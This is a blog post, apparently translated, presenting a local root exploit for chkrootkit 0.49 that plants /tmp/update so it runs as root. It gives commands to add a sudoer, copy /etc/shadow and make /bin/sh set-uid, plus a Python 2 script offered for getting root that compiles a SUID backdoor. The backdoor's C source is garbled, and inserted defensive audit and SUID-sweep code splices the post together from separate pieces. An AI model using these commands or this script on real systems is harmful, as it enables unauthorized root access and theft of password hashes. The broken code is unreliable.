Local root exploit in Chkrootkit

Hello!

Security researchers have found a local exploit for Chkrootkit 0.49 that allows an unprivileged user to run commands as root (the current Chkrootkit version is 0.50).

Proof of concept

When Chkrootkit is executed, the file '/tmp/update' is executed with the permissions of the user who launched Chkrootkit.
To launch Chkrootkit we use sudo so that it runs as the superuser, like this:

sudo chkrootkit

If we run it as an ordinary user, like this:

hd@kali:/root$ chkrootkit
chkrootkit need root privileges

Chkrootkit must be run as root, so '/tmp/update' runs as root too.
Now we can create '/tmp/update' to become root.

Privilege escalation

Make a user a sudoer

adduser bob sudo

Read /etc/shadow

cat /etc/shadow > /tmp/shadow

and then read /tmp/shadow.

Get a root shell

chown root:root /bin/sh ; chmod 4777 /bin/sh

To get a root shell, execute '/bin/sh':

bash-4.4$ whoami
bash-4.4$ /bin/sh
# whoami

Don't forget to make '/tmp/update' executable:

chmod +x /tmp/update


'/tmp/update' is executed every time Chkrootkit runs, so check the cron configuration to find out when chkrootkit is launched.
After that, the content of '/tmp/update' will be executed and you can become root or run commands as root.
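From the defender's side, the two things worth checking on a host are the installed chkrootkit version and whether anything is sitting at the path that version 0.49 executes as root, plus the cron schedule the post tells the reader to look up. The following is an added example (not code from the post) that does those checks; it assumes 'chkrootkit -V' prints a version containing a "major.minor" number, treats releases below 0.49 as affected as well (an assumption; the post only names 0.49), and uses constructed cron lines and a constructed scratch file in place of the real host.

```python
import os
import re
import stat
import tempfile

# Constructed sample of system cron lines (illustrative, not from the post).
SAMPLE_CRON_LINES = [
    "# m h dom mon dow user  command",
    "17 *  * * * root cd / && run-parts --report /etc/cron.hourly",
    "0 3   * * * root /usr/sbin/chkrootkit -q",
]

VERSION_RE = re.compile(r"(\d+)\.(\d+)")


def parse_version(version_output):
    """Pull (major, minor) out of whatever 'chkrootkit -V' prints.
    The banner wording is assumed; only the digits are relied on."""
    m = VERSION_RE.search(version_output)
    return (int(m.group(1)), int(m.group(2))) if m else None


def version_is_vulnerable(version_output):
    """0.49 is the release the post names as affected and 0.50 as current.
    Releases below 0.49 are also flagged here (an assumption, not a page fact)."""
    v = parse_version(version_output)
    return v is not None and v <= (0, 49)


def audit_update_file(path="/tmp/update"):
    """Findings about the file chkrootkit 0.49 executes as root.
    An empty list means there is nothing to report."""
    findings = []
    if not os.path.lexists(path):
        return findings
    st = os.lstat(path)
    findings.append("%s exists; chkrootkit 0.49 would execute it as root" % path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("%s is a symlink to %s" % (path, os.readlink(path)))
    if st.st_uid != 0:
        findings.append("%s is owned by uid %d, not root" % (path, st.st_uid))
    if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("%s is executable" % path)
    if st.st_mode & stat.S_IWOTH:
        findings.append("%s is world-writable" % path)
    return findings


def find_chkrootkit_cron(cron_lines):
    """Non-comment cron lines that launch chkrootkit: the schedule the post says to look up."""
    return [line for line in cron_lines
            if not line.lstrip().startswith("#") and "chkrootkit" in line]


def demo_audit():
    """Create a constructed executable 'update' file in a scratch dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "update")
        with open(p, "w") as f:
            f.write("echo constructed sample\n")
        os.chmod(p, 0o755)
        return audit_update_file(p)


if __name__ == "__main__":
    import subprocess
    try:
        out = subprocess.run(["/usr/sbin/chkrootkit", "-V"],
                             capture_output=True, text=True).stdout
        print("vulnerable version:", version_is_vulnerable(out))
    except OSError:
        print("chkrootkit not found at /usr/sbin/chkrootkit")
    for finding in audit_update_file():
        print("finding:", finding)
    for line in find_chkrootkit_cron(SAMPLE_CRON_LINES):
        print("cron entry:", line)
```

On a real host the cron lines would come from /etc/crontab and /etc/cron.d rather than the constructed list; any finding from audit_update_file on a 0.49 install means the file should be removed and the package upgraded to 0.50.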

Exploit's doc : https://www.exploit-db.com/exploits/33899/

I've made a tool in Python to get r00t using this exploit:


# Python 2 script (the 'commands' module does not exist in Python 3)
import commands
import sys
import time
import os

chkrootkit = '/usr/sbin/chkrootkit'

print("[*] checking if chkrootkit is installed")
if os.path.exists(chkrootkit):
    print("[+] chkrootkit is installed")
else:
    sys.exit("[-] chkrootkit is not installed")

print("[*] checking if chkrootkit's version is vulnerable")
sortie = commands.getoutput("{} -V".format(chkrootkit))
if "0.49" in sortie:
    print("[+] chkrootkit is vulnerable")
else:
    sys.exit("[-] chkrootkit is not vulnerable")

print("[*] writing SUID executable")
fichier = open("/var/tmp/suid.c", "w")

# simple SUID backdoor
# NOTE: the header names in the #include lines and the body of main() were
# lost when the original post was extracted; they are left as they appeared.
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("int main()\n")
fichier.write("return 0;\n")
fichier.close()

print("[*] compiling SUID executable")
os.system("gcc /var/tmp/suid.c -o /var/tmp/suid")

print("[*] exploit chkrootkit vulnerability")
update = open("/tmp/update", "w")
update.write("chown root:root /var/tmp/suid ; chmod 4755 /var/tmp/suid\n")
update.close()
os.system("chmod +x /tmp/update")

print("[*] waiting 5 minutes before chkrootkit execute our backdoor with root permissions")
time.sleep(300)  # the original script imported time but never actually waited

if "-rwsr-xr-x" in commands.getoutput("ls -lah /var/tmp/suid"):
    print("got r00t ? ")
else:
    print("""[-] chkrootkit wasn't executed by crontab in 5 minutes ... You need to wait for chkrootkit's execution by crontab, then execute /var/tmp/suid and you will get a root shell""")
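The artifact this tool leaves behind is a root-owned set-uid binary in /var/tmp, which is exactly the kind of thing an administrator can sweep for after a suspected incident. The following is an added example, not the post's code, that walks the world-writable directories and reports any set-uid regular file; the directory list and the staged sample file are assumptions made for the demonstration.

```python
import os
import stat
import tempfile

# Directories any local user can write to; the post stages its payload in /var/tmp.
WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def is_suid_regular_file(path):
    """True when path is a regular file (not a symlink) with the set-uid bit set."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid_files(dirs):
    """Walk the given directories and return (path, owner uid) for every
    set-uid regular file found, sorted by path. A root-owned set-uid file in a
    temp directory is what the post's /tmp/update payload leaves behind."""
    hits = []
    for top in dirs:
        for root, _subdirs, files in os.walk(top):
            for name in files:
                p = os.path.join(root, name)
                if is_suid_regular_file(p):
                    hits.append((p, os.lstat(p).st_uid))
    return sorted(hits)


def demo_empty_scan():
    """Scan a fresh scratch directory: nothing staged, nothing found."""
    with tempfile.TemporaryDirectory() as d:
        return find_suid_files([d])


def demo_suid_scan():
    """Stage a constructed set-uid file in a scratch directory and scan for it.
    Returns (bit_was_set, found_exactly_that_file); some filesystems refuse to
    keep the set-uid bit, so the caller compares the two instead of assuming."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "suid")
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho constructed sample\n")
        os.chmod(p, 0o4755)
        bit_set = bool(os.stat(p).st_mode & stat.S_ISUID)
        found = [path for path, _uid in find_suid_files([d])]
        return bit_set, found == [p]


if __name__ == "__main__":
    for path, uid in find_suid_files(WORLD_WRITABLE_DIRS):
        print("set-uid file in a world-writable directory: %s (uid %d)" % (path, uid))
```

Run as root the scan covers files other users created; a hit owned by uid 0 inside /tmp or /var/tmp has no legitimate reason to exist and points straight at the post's payload.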

